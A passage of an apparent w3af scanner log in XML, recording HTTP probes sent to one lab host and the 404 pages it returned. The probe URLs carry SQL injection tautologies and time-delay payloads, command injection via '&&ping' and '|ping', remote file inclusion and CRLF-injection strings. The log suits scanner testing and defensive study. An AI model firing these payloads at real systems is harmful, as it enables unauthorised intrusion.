        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70+OR+70%3D70+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="539">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="541">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="542">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="543">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="544">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="545">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Dvulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Dvulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="547">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="548">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="555">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="556">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70+AND+70%3D71+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70+AND+70%3D71+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70+AND+70%3D71+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="563">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="583">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/42+OR+42%3D42+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 42+OR+42%3D42+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='42+OR+42%3D42+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="598">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/42+AND+42%3D43+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 42+AND+42%3D43+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='42+AND+42%3D43+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="618">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="643">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/oLN8EKV8 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about oLN8EKV8 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='oLN8EKV8'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="647">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="662">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="675">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/DsSrs2os HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about DsSrs2os has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='DsSrs2os'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="682">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/xqpud%3C%2F-%3Exqpud%2F%2Axqpud%22xqpudxqpud%27xqpudxqpud%60xqpudxqpud+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about xqpud%3C%2F-%3Exqpud%2F%2Axqpud%22xqpudxqpud%27xqpudxqpud%60xqpudxqpud+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='xqpud%3C%2F-%3Exqpud%2F%2Axqpud%22xqpudxqpud%27xqpudxqpud%60xqpudxqpud+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="683">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24%22+OR+%2224%22%3D%2224 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24%22+OR+%2224%22%3D%2224 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24%22+OR+%2224%22%3D%2224'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="685">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="690">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24%22+AND+%2224%22%3D%2225 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24%22+AND+%2224%22%3D%2225 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24%22+AND+%2224%22%3D%2225'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="697">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="711">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/QRT5BxM8 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about QRT5BxM8 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='QRT5BxM8'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="712">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/13%22+OR+%2213%22%3D%2213 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 13%22+OR+%2213%22%3D%2213 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
